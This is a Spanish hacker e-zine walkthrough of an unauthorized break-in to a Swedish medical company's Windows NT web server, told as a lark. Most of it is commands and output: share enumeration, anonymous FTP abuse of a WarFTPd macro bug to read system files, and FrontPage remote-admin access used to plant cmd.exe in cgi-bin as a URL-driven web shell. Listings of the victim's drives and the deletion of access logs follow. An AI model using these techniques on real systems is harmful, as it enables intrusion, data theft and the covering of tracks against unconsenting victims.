
+------+-------------------------------------------+----------+--------------+
|  +-->|     NT world, BGates world, Kaos world    |<---------|   GuyBrush   |
+->|<--> r17_07 <-+-----------+-----+--------->+--------------+----------->|-+
   +--------------------------------------------------------------------------



Objetivo
^^^^^^^^
Un  servidor elegido  al  azar ... en  este  caso uno  sueco con una web sobre
medicina. Se trata  de una  peque~a red de  6 equipos (todos con NT) pero como
todos  tienen  fallos similares,  me  limitare a comentar la entrada de uno de
ellos solamente.


Objetivos
^^^^^^^^^
Esta claro ... aprender  :)


Introduccion
^^^^^^^^^^^^
Todo el  mundo sabe que  los  Sistemas Operativos de Bill Gates son pesimos en
todos  los sentidos (estabilidad,  seguridad, etc) pero aun asi los hay que se
arriesgan a usarlos en una red a la que cualquiera puede acceder ...

Los administradores  de NT  tienen  suerte de  que  la  mayoria  de hackers se
centren  en maquinas tipo  Unix  pero  desgraciadamente para ellos cada dia el
NT-hacking se  pone mas de moda. Y es esa moda la que ha hecho que me pique la
curiosidad y me  adentre un poco en el NT-world. Y que mejor forma de aprender
que intentando hackear uno  :)

NOTA: aunque este texto este escrito en primera persona, no realice yo todo el
trabajo. Digamos que hice un 50% del mismo ... el otro 50% lo realizo mi buena
amiga DustyGirl (por cierto, me obliga  a decir que  NO es una  hacker ... tan
solo algo curiosa  :)


Primeros pasos
^^^^^^^^^^^^^^
Me  instale Windows  NT, dado que  la mayoria de herramientas para hackear NTs
solo funcionan  bajo este sistema. Recopile  algunas utilidades  de la red, me
lei algunos docs y me puse manos a la obra ...

Primero, para entrar en calor mejor buscar algun pobre usuario de Windows, que
siempre sabra menos que un administrador (o se supone que deberia saber menos)
asi que me  adentre en el oscuro  mundo del IRC en busca de algun conejillo de
indias...

/join #sexo  ... por aqui hay mucha pe~a  :)
Herramientas --> Escanear puertos abiertos en el canal
Buscar --> Puerto 1080

Que barbaro!!!! cuanta  gente  usa WinGate!!!  bueno,  si usan  un  proxy sera
porque  tienen una  red y, si tienen  una red,  sera  porque  comparten  algun
recurso ... no voy a  poner  aqui los  resultados  de mis  pruebas  porque  ya
incluire el log  del otro hack el cual realice de forma similar. Solo dire que
los  resultados fueron  sorprendentes. No os  podeis imaginar la gran cantidad
de  gente que  comparte recursos sin usar ninguna contrase~a o usando los pass
por defecto. Incluso  a mi buena amiga  DustyGirl se  le olvido ponerle pass a
su impresora y gastandole una bromilla le envie un peque~o texto  :)

Bien, pero antes de pasar a hackear el servidor quise hacer una ultima prueba:

/join #un_canal_de_hackers
Herramientas --> Escanear puertos abiertos en el canal
Buscar --> Puerto 1080

Vaya!!! los  hackers tambien  usan  windows ... y  WinGate ... pero seguro que
ellos no tienen  recursos compartidos ... bueno, pero seguro que esos recursos
no tienen las claves por defecto ... ejem ... pasemos al hack del server  :)


Manos a la obra
^^^^^^^^^^^^^^^
El servidor que  escogimos no fue del todo al azar. La verdad es que bromeando
con ^Shadown^, el  cual me sorprende su gran habilidad por ocultar su IP en la
red,  quise chequear  la seguridad  de  su NT  y despues  de realizar  algunos
chequeos me  di cuenta de  que me habia  confundido de 'victima'.  Este server
era uno sueco cuyo contenido web era sobre temas de medicinas o algo asi.

Y ya que  comenzamos con ese server, quisimos seguir con el hasta el final ...
digamos que le cogimos  cari~o y decidimos  hacer un estudio gratuito sobre la
seguridad de su red  :)


Descripcion del ataque
^^^^^^^^^^^^^^^^^^^^^^
C:\> NBTSTAT -A XXX.15.YYY.89
No se ha encontrado el host.

Ups ... parece que  no siempre  es  tan sencillo  como pone en algunos docs de
hacking ...

C:\> NAT XXX.15.YYY.89

---------------------8<------------------------------------------------------
[*]--- Checking host: XXX.15.YYY.89
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Fri Feb 11 15:58:56 2000
[*]--- Timezone is UTC+1.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session

[*]--- Obtained server information:

Server=[SMIDIALOG] User=[] Workgroup=[SMINET] Domain=[]

[*]--- Obtained listing of shares:

        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$         Disk:     Remote Admin
        Backup         Disk:     
        C$             Disk:     Default share
        D$             Disk:     Default share
        DBDump         Disk:     
        F              Disk:     
        IPC$           IPC:      Remote IPC
        MedINT         Disk:     
        MSQUERY        Disk:     
        Office97       Disk:     
        Slask          Disk:     
        SLDatabaser    Disk:     
        wwwroot        Disk:     

[*]--- This machine has a browse list:

        Server               Comment
        ---------            -------
        DOC                  
        SMIBDC               
        SMIDIALOG            
        SMIMAIL              


[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\Backup
[*]--- WARNING: Able to access share: \\*SMBSERVER\Backup
[*]--- Checking write access in: \\*SMBSERVER\Backup
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Backup

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\DBDump
[*]--- WARNING: Able to access share: \\*SMBSERVER\DBDump
[*]--- Checking write access in: \\*SMBSERVER\DBDump
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\DBDump

[*]--- Attempting to access share: \\*SMBSERVER\F
[*]--- WARNING: Able to access share: \\*SMBSERVER\F
[*]--- Checking write access in: \\*SMBSERVER\F
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\F

[*]--- Attempting to access share: \\*SMBSERVER\MedINT
[*]--- WARNING: Able to access share: \\*SMBSERVER\MedINT
[*]--- Checking write access in: \\*SMBSERVER\MedINT
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\MedINT

[*]--- Attempting to access share: \\*SMBSERVER\MSQUERY
[*]--- WARNING: Able to access share: \\*SMBSERVER\MSQUERY
[*]--- Checking write access in: \\*SMBSERVER\MSQUERY
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\MSQUERY
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\MSQUERY

[*]--- Attempting to access share: \\*SMBSERVER\Office97
[*]--- WARNING: Able to access share: \\*SMBSERVER\Office97
[*]--- Checking write access in: \\*SMBSERVER\Office97
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Office97

[*]--- Attempting to access share: \\*SMBSERVER\Slask
[*]--- WARNING: Able to access share: \\*SMBSERVER\Slask
[*]--- Checking write access in: \\*SMBSERVER\Slask
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Slask

[*]--- Attempting to access share: \\*SMBSERVER\SLDatabaser
[*]--- WARNING: Able to access share: \\*SMBSERVER\SLDatabaser
[*]--- Checking write access in: \\*SMBSERVER\SLDatabaser
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\SLDatabaser

[*]--- Attempting to access share: \\*SMBSERVER\wwwroot
[*]--- WARNING: Able to access share: \\*SMBSERVER\wwwroot
[*]--- Checking write access in: \\*SMBSERVER\wwwroot
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\wwwroot

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
---------------------8<------------------------------------------------------

Vaya!! cuanta info ... vamos a conectarnos para verificar todo lo que nos dice
el NAT ... a~ado la IP con el nombre del equipo en mi fichero hosts y ...
Inicio->Buscar->Equipo->XXX.15.YYY.89

y me sale:
  XXX.15.YYY.89    SMINET

Ahora pincho sobre el server y me sale en la ventana:
  Backup
  DBDump
  f
  MedINT
  Msquery
  Office97
  Slask
  SLDatabaser
  wwwroot
  Impresoras

Intento entrar ...
        Backup y ... 'se ha denegado el acceso'
        DBDump ... 'se ha denegado el acceso'
y asi  con todos menos  Msquery  que si que me dejo ver su contenido ... bueno,
para empezar no esta mal  :PP
Tambien pude entrar en el de Impresoras pero no habia nada.

Vamos a echar un vistazo a sus puertos a ver que servicios usa ...

Escaneando XXX.15.YYY.89 ...
     ftp on port 21
     web on port 80

Parece  que este es un servidor web que tiene el ftp para poder actualizar las
paginas remotamente. Me  conecto a  su  pagina y no entiendo una mierda porque
esta todo en aleman asi que paso a chequear que soft usan en estos puertos ...

telnet XXX.15.YYY.89 21

220-smidialog Server
    WarFTPd 1.70.b01.04 (Aug 18 1998) Ready
        (C)opyright 1996 - 1998 by Jarle (jgaa) Aase - all rights reserved.
        220 Please enter your user name.


telnet XXX.15.YYY.89 80
GET HTTP/1.0

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/4.0
Date: Sun, 13 Feb 2000 17:54:19 GMT
Content-Type: text/html
Content-Length: 87
 

vaya vaya ... creo que este admin no esta muy puesto en seguridad. Esa version
del War-Ftp (la 1.70) tiene  un enorme  fallo  de seguridad  en sus macros que
permite acceso  remoto a  cualquier parte  del server. Me documento un poco en
packetstorm y voila!! parece que mediante el comando 'literal' se puede editar
cualquier fichero  del server asi que  me instalo  el susodicho programa  para
probarlo primero en mi computer y tras hacer algunos experimentos decido echar
un ojo al servidor ...

---------------------8<------------------------------------------------------
C:\> ftp XXX.15.YYY.89
Connected to XXX.15.YYY.89.
220-smidialog Server
    WarFTPd 1.70.b01.04 (Aug 18 1998) Ready
    (C)opyright 1996 - 1998 by Jarle (jgaa) Aase - all rights reserved.
220 Please enter your user name.
User (XXX.15.YYY.89:(none)): anonymous
331 User name okay. Give your full Email address as password.
Password: guest
230 User  logged in.
ftp> literal [$osname]
500 'WIN32 (NT 4.0 1381 Pentium 1-CPU)': command not understood.
ftp> literal [c:\winnt\repair\sam._]
500 'MSCFs': command not understood.
ftp> bye
221 Goodbye. Control connection closed.
---------------------8<------------------------------------------------------

Estuve dotoreando  un  poco en  el  servidor pero  no  consegui  ningun  texto
interesante dado que es  un ataque un poco 'a ciegas' y como es algo aburrido,
lo deje estar. Intente editar  el fichero 'sam._'  pero tal y  como  decia  la
descripcion  del bug, solo  se pueden  editar ficheros de  texto  dado que los
binarios tienen algunos caracteres que se identifican como final de  fichero y
solo se puede ver una minima parte ya que se corta la edicion enseguida.

Pasemos ahora  a examinar el otro servicio ... Microsoft-IIS/4.0 ... jeje este
tambien tiene algunos  problemillas de  seguridad bastante  graves. Segun pone
en  unos textos  que lei, es  posible administrar remotamente  el servidor web
usando el  explorador  de frontpage. Vamos a ver si esto es cierto ... abro mi
frontpage e intento administrarlo remotamente ...
        [archivo->abrir web de frontpage->XXX.15.YYY.89]

... voila!! parece que tengo acceso a su web  :)

Navego  un poco  y  me bajo  algunas cosillas desde el explorador del FP. Jeje
vaya pagina mas descuidada ... bueno, vamos a hacer algo creativo. En lugar de
bajarme cosas vamos a subirlas. Parece  que tiene un directorio cgi-bin con un
par de programas.  Esto quiere  decir que  soporta cgis  asi  que subire a ese
directorio  el cmd.exe (en NT, equivalente al command.com del DOS) y asi podre
acceder  desde mi navegador ejecutando  remotamente comandos (de forma similar
a como se hace con el tan famoso bug del phf del que tanto se ha hablado) ...

Subo el binario al cgi-bin y vuelvo al navegador a probar algunas cosas ...

http://XXX.15.YYY.89/cgi-bin/cmd.exe?/c%20dir%20c:\

---------------------8<------------------------------------------------------
 Directorio de c:\

99-04-28  13:26                      0 AUTOEXEC.BAT
99-05-10  15:54         <DIR>          CDCREATR
99-04-28  13:26                      0 CONFIG.SYS
00-02-11  15:01                 52 964 msquery
99-05-06  18:14         <DIR>          MSSQL
99-09-28  12:49         <DIR>          Program Files
99-05-11  08:12         <DIR>          sqlany50
00-02-11  13:44         <DIR>          TEMP
00-01-19  10:51         <DIR>          WINNT
               9 archivos         52 964 bytes
                                           661 595 136 bytes libres
---------------------8<------------------------------------------------------

Jeje  esto se pone interesante ... no  hace falta decir que el %20 equivale al
codigo ASCII del espacio ... y echando un ojo a su sistema me sale todo esto:

---------------------8<------------------------------------------------------
Directorio de c:\WINNT

00-01-19  10:51         <DIR>          .
00-01-19  10:51         <DIR>          ..
99-05-17  08:15                    179 ACROREAD.INI
99-04-27  15:50                  1 319 Active Setup Log.BAK
99-04-27  15:58                 12 935 Active Setup Log.txt
99-04-27  15:58                 21 749 Bind List Log.txt
96-10-14  02:38                  5 328 black16.scr
99-04-27  15:56         <DIR>          CatRoot
95-07-20  17:00                189 952 CCARD232.EXE
97-11-17  23:00                 84 032 Channel Screen Saver.SCR
96-10-14  02:38                 82 944 clock.avi
97-11-06  17:21                 44 544 clspack.exe
99-04-28  13:19         <DIR>          Config
99-04-28  13:26                      0 control.ini
99-04-27  15:56         <DIR>          COOKIES
95-11-01  11:27                151 040 CRLLYRNT.DLL
99-04-27  15:56         <DIR>          Cursors
99-09-27  07:40                246 035 drwtsn32.log
97-04-30  23:00                234 256 EXPLORER.EXE
97-11-17  23:00                103 424 EXTRAC32.EXE
97-11-17  23:00                 52 998 EXTRACT.EXE
99-05-03  16:25                    276 frontpg.ini
99-05-18  08:55         <DIR>          Help
99-03-02  23:00                 26 896 hh.exe
99-04-27  15:56         <DIR>          History
99-04-27  15:56                127 391 IE4 Setup Log.Txt
97-11-17  23:00                 17 655 IEXTRACT.EXE
99-05-06  18:17                    354 INFOVIEW.INI
97-05-29  16:31                314 880 IsUn041d.exe
98-07-30  12:51                305 152 IsUninst.exe
97-11-06  16:23                  6 550 jautoexp.dat
99-04-27  15:57         <DIR>          Java
99-04-27  15:57                  1 334 javainst.log
97-11-06  16:59                 44 544 jview.exe
96-10-14  02:38                157 044 lanma256.bmp
96-10-14  02:38                157 044 lanmannt.bmp
99-04-27  11:25         <DIR>          Media
99-10-20  09:25                    129 mmc.INI
99-05-06  18:14         <DIR>          MSAPPS
99-04-27  16:06                 16 384 MSIMGSIZ.DAT
95-07-20  17:00                209 228 MSQRY32.CUE
96-10-14  02:38                 67 328 network.wri
96-10-14  02:38                 45 328 NOTEPAD.EXE
99-09-28  13:30                    825 ODBC.INI
95-06-07  03:24                  7 168 odbcad32.exe
95-03-03  05:00                  6 464 odbcadm.exe
95-06-07  03:25                  6 656 odbccp32.cpl
95-03-03  05:00                 17 412 odbcinst.hlp
99-09-28  13:30                  1 227 ODBCINST.INI
96-10-14  02:38                123 152 poledit.exe
96-10-14  02:38                 34 816 printer.wri
99-08-24  10:19         <DIR>          Profiles
99-09-13  08:28                    106 Reg Save Log.txt
96-10-14  02:38                 71 952 REGEDIT.EXE
99-04-27  11:26         <DIR>          repair
99-04-27  16:02                 19 618 RunOnceEx Log.txt
99-05-03  16:19         <DIR>          Samples
99-12-31  12:00                 32 657 SchedLog.Txt
97-11-06  17:13                 42 496 setdebug.exe
99-09-13  08:28                    463 setup.old
99-04-27  11:25                    138 setuplog.txt
99-04-27  15:42                154 494 SMIDIALOG.bmp
99-05-18  08:58                    379 Soft Boot Log.txt
99-05-11  08:12                      0 sqlany.ini
99-04-27  16:02         <DIR>          Subscriptions
99-09-28  13:29         <DIR>          system
96-10-14  02:38                    219 system.ini
00-01-19  10:52         <DIR>          system32
96-10-14  02:38                 32 016 TASKMAN.EXE
99-04-27  16:02         <DIR>          Temporary Internet Files
96-11-06  11:10                301 568 unin041d.exe
98-05-22  01:01                299 008 uninst.exe
99-09-27  07:41             12 132 271 user.dmp
96-10-14  02:38                 24 336 vmmreg32.dll
99-04-27  15:57         <DIR>          Web
96-10-14  02:38                 22 288 welcome.exe
00-02-04  14:19                    358 WIN.INI
96-10-14  02:38                      3 WINFILE.INI
96-10-14  02:38                256 192 WINHELP.EXE
97-04-30  23:00                311 056 WINHLP32.EXE
96-10-14  02:38                    707 _DEFAULT.PIF
99-09-15  10:26                      0 ~DF4D8.tmp
99-05-04  12:45                      0 ~DFCA20.tmp
99-05-05  09:20                      0 ~DFD0BC.tmp
99-08-24  10:15                      0 ~DFD65E.tmp
99-08-13  14:41                      0 ~DFD7F9.tmp
99-05-18  09:00                      0 ~DFD83F.tmp
99-08-24  10:07                      0 ~DFD885.tmp
99-09-01  09:43                      0 ~DFD8FD.tmp
99-05-23  12:46                      0 ~DFD980.tmp
99-09-03  06:53                      0 ~DFDA84.tmp
99-09-09  13:09                      0 ~DFDA8E.tmp
99-06-03  08:10                      0 ~DFDAC0.tmp
99-09-07  13:25                      0 ~DFDB06.tmp
99-09-27  07:10                      0 ~DFDB24.tmp
99-08-25  08:13                      0 ~DFDC1F.tmp
99-05-03  16:29                      0 ~DFDCA1.tmp
99-09-20  07:33                      0 ~DFDD05.tmp
99-07-21  09:39                      0 ~DFDD2D.tmp
99-09-03  08:00                      0 ~DFDD37.tmp
99-06-04  10:57                      0 ~DFDD87.tmp
99-05-26  11:39                      0 ~DFDDD7.tmp
99-05-17  08:20                      0 ~DFDFC2.tmp
00-01-19  10:51                      0 ~DFE21B.tmp
99-08-24  11:24                      0 ~DFE315.tmp
99-09-22  07:40                      0 ~DFE3D3.tmp
99-09-27  16:15                      0 ~DFE713.tmp
99-09-22  07:02                      0 ~DFE73B.tmp
99-12-03  10:33                      0 ~DFE781.tmp
99-10-04  08:12                      0 ~DFE78B.tmp
99-10-20  09:10                      0 ~DFE803.tmp
99-09-28  13:32                      0 ~DFE80D.tmp
99-08-31  07:53                      0 ~DFE82B.tmp
99-07-19  16:55                      0 ~DFE899.tmp
99-09-21  11:59                      0 ~DFE91B.tmp
99-05-11  08:17                      0 ~DFE92F.tmp
99-09-21  10:24                      0 ~DFE943.tmp
99-11-03  11:24                      0 ~DFE96B.tmp
99-11-26  11:28                      0 ~DFE9BC.tmp
99-10-17  11:04                      0 ~DFE9C6.tmp
99-12-10  08:46                      0 ~DFE9F8.tmp
99-11-13  11:15                      0 ~DFEA2A.tmp
99-09-28  07:36                      0 ~DFEA7A.tmp
99-09-28  12:59                      0 ~DFEAA2.tmp
99-09-21  15:41                      0 ~DFEAE8.tmp
99-09-13  16:31                      0 ~DFEB24.tmp
99-08-04  10:17                      0 ~DFEB38.tmp
99-09-15  14:13                      0 ~DFEB6A.tmp
99-06-02  09:47                      0 ~DFEC00.tmp
99-09-23  12:38                      0 ~DFEC97.tmp
99-09-13  07:03                      0 ~DFECDD.tmp
99-09-10  07:48                      0 ~DFECF1.tmp
99-09-24  08:07                      0 ~DFED5F.tmp
00-01-03  08:37                      0 ~DFEE09.tmp
99-05-25  10:48                      0 ~DFEE27.tmp
99-09-11  05:53                      0 ~DFFE1D.tmp
             136 archivos     16 628 297 bytes
                                         661 595 136 bytes libres


 Directorio de c:\WINNT\catroot

99-04-27  15:56         <DIR>          .
99-04-27  15:56         <DIR>          ..
97-11-17  23:00                157 696 ICATALOG.MDB
               3 archivos        157 696 bytes
                                           661 595 136 bytes libres
---------------------8<------------------------------------------------------

Esta BD me la baje pero estaba vacia  :((


---------------------8<------------------------------------------------------
 Directorio de c:\WINNT\profiles

99-08-24  10:19         <DIR>          .
99-08-24  10:19         <DIR>          ..
99-09-13  08:28         <DIR>          Administrator
99-04-28  13:22         <DIR>          All Users
99-04-27  11:26         <DIR>          Default User
99-08-24  10:19         <DIR>          PerH
99-04-27  16:02         <DIR>          SMIAdmin
               7 archivos              0 bytes
                                           661 648 384 bytes libres


 Directorio de c:\WINNT\repair

99-04-27  11:26         <DIR>          .
99-04-27  11:26         <DIR>          ..
96-10-14  02:38                    438 autoexec.nt
99-04-28  13:26                  2 510 config.nt
99-04-27  11:26                 16 752 default._
99-04-27  11:26                 14 614 ntuser.da_
99-04-27  11:26                  2 889 sam._
99-04-27  11:26                  2 895 security._
99-04-27  15:53                 50 015 setup.log
99-04-27  11:26                121 160 software._
99-04-27  11:26                 70 669 system._
              11 archivos        281 942 bytes
                                          661 648 384 bytes libres
---------------------8<------------------------------------------------------

Estos files no tenian permiso de lectura por  lo que  no pude bajarlos ... una
pena ..

---------------------8<------------------------------------------------------
 Directorio de d:\

99-04-27  12:06         <DIR>          I386
99-09-13  08:33         <DIR>          Inetpub
00-02-09  11:14         <DIR>          MI
99-11-18  11:33         <DIR>          Mssql
00-01-19  10:51            279 969 792 pagefile.sys
99-05-03  16:22         <DIR>          Program Files
00-02-12  01:04         <DIR>          SpeedlineDB
00-02-10  17:27         <DIR>          Temp
               8 archivos    279 969 792 bytes
                                            23 449 600 bytes libres


Directorio de d:\inetpub

99-09-13  08:33         <DIR>          .
99-09-13  08:33         <DIR>          ..
99-09-03  07:28                    248 adresser till LQ formulr.txt
99-05-03  16:23         <DIR>          ftproot
99-05-03  16:22         <DIR>          iissamples
99-09-02  09:08                     13 ipnr.txt
99-05-03  16:22         <DIR>          Mail
99-05-03  16:24         <DIR>          Mailroot
99-11-02  15:33         <DIR>          scripts
00-02-12  21:01         <DIR>          wwwroot
              10 archivos            261 bytes
                                           23 449 600 bytes libres
---------------------8<------------------------------------------------------

Vaya!! encontre  donde  esta el servidor web  :)  ahora podre copiar lo que me
interese a d:\inetpub\wwwroot y bajarmelo tranquilamente desde mi navegador.


---------------------8<------------------------------------------------------
 Directorio de d:\inetpub\mailroot

99-05-03  16:24         <DIR>          .
99-05-03  16:24         <DIR>          ..
99-05-03  16:24         <DIR>          Badmail
99-05-03  16:24         <DIR>          Drop
99-05-03  16:24         <DIR>          Mailbox
99-05-03  16:24         <DIR>          Pickup
99-05-03  16:24         <DIR>          Queue
99-05-03  16:24         <DIR>          Route
99-05-03  16:24         <DIR>          SortTemp
               9 archivos              0 bytes
                                            23 449 600 bytes libres
---------------------8<------------------------------------------------------

Todos estos  directorios estaban vacios ... se ve que lo instalaron pero no lo
han usado. Y lo mismo pasa con el directorio Mail y el ftproot.


---------------------8<------------------------------------------------------
 Directorio de c:\winnt\system32\config

99-04-28  13:22         <DIR>          .
99-04-28  13:22         <DIR>          ..
00-01-18  02:00                524 288 AppEvent.Evt
00-02-08  23:33                 81 920 default
00-02-08  23:33                  1 024 default.LOG
99-04-28  13:20                 65 536 default.sav
00-02-12  20:46                 24 576 SAM
00-02-12  20:46                  1 024 SAM.LOG
99-04-27  11:54                 65 536 SecEvent.Evt
00-02-08  19:22                 49 152 SECURITY
00-02-08  19:22                  1 024 SECURITY.LOG
00-02-11  13:45              3 850 240 software
00-02-11  13:45                  1 024 software.LOG
99-04-28  13:20                323 584 software.sav
99-12-31  12:00                 65 536 SysEvent.Evt
00-02-02  16:23              1 429 504 system
00-02-02  16:23              1 429 504 SYSTEM.ALT
99-04-28  13:20                  1 024 system.LOG
99-04-28  13:20                192 512 system.sav
96-10-14  02:38                 77 824 userdiff
              20 archivos      8 184 832 bytes
                                          661 648 384 bytes libres


 Directorio de c:\program files

99-09-28  12:49         <DIR>          .
99-09-28  12:49         <DIR>          ..
99-05-17  08:15         <DIR>          Acrobat Reader
99-05-17  08:16         <DIR>          CD-Writer Plus
99-04-27  15:56         <DIR>          Common Files
99-09-03  13:49         <DIR>          McAfee
99-05-03  16:23         <DIR>          Microsoft Script Debugger
99-05-03  16:21         <DIR>          Mts
99-04-27  11:25         <DIR>          Plus!
99-09-28  12:49         <DIR>          Sybase
00-01-10  15:33         <DIR>          websvar
99-04-27  15:54         <DIR>          Windows NT
99-09-07  09:11         <DIR>          WinZip
              13 archivos              0 bytes
                                          661 648 384 bytes libres


 Directorio de c:\winnt\system32\logfiles

99-09-07  15:17         <DIR>          .
99-09-07  15:17         <DIR>          ..
99-06-22  11:38         <DIR>          MSFTPSVC1
99-05-16  14:29         <DIR>          SMTPSVC1
99-09-09  07:08         <DIR>          W3SVC1
99-09-07  15:17         <DIR>          W3SVC2
               6 archivos              0 bytes
                                           661 647 872 bytes libres


Directorio de c:\winnt\system32\logfiles\msftpsvc1

00-02-12  21:39         <DIR>          .
00-02-12  21:39         <DIR>          ..
00-02-07  02:32                    460 ex000205.log
00-02-10  03:07                    232 ex000207.log
00-02-12  21:39                    232 ex000210.log
00-02-12  21:39                 65 536 ex000212.log
99-07-19  16:52                    191 ex990622.log
99-08-14  01:16                 65 536 ex990814.log
99-10-18  09:52                 65 536 ex991018.log
99-11-03  11:23                    187 ex991023.log
              10 archivos        197 910 bytes
                                          661 647 872 bytes libres
---------------------8<------------------------------------------------------

Ups ... aqui  deben estar todos  esos  accesos que he realizado al sistema ...
no me gusta hacer esto pero ... creo que los borrare  :)

Bien, creo que  ya me he divertido bastante. Borro el  cmd.exe del server y me
desconecto.

Como veis,  sin necesidad  de usar ningun tipo de programa (el NAT lo use pero
no me  sirvio para entrar dado  que el server no requeria contrase~a alguna; y
el escaneador de puertos tampoco era necesario para chequear los puertos FTP y
WEB) pude  entrar e  incluso podia  haber modificado su  pagina web o hacerles
cualquier cosa (como subir  un sniffer,  un keylogger,  o incluso borrarles el
disco duro)  ya que tenia  control  absoluto de la maquina ... suerte que  ese
no es  mi estilo y  en su lugar  envie un  mail al admin  advirtiendole de sus
enormes fallos de seguridad.

Esto  demuestra que  los  servidores NT son muy vulnerables. Si te arriesgas a
usar NT  para administrar tus maquinas  asegurate de  poner buenos pass, estar
al dia en  cuanto a los fallos de seguridad, actualizar los Service Pack (este
server tenia solo hasta el 3) y sobre todo no olvides poner un buen firewall.


Agradecimientos
^^^^^^^^^^^^^^^
A  DustyGirl naturalmente  ya que el hack fue realizado  por ambos y como no a
mi amigo  y compa~ero de Team, ^Shadown^ por su gran apoyo en mi adentramiento
en el mundo de Bill Gates  :)

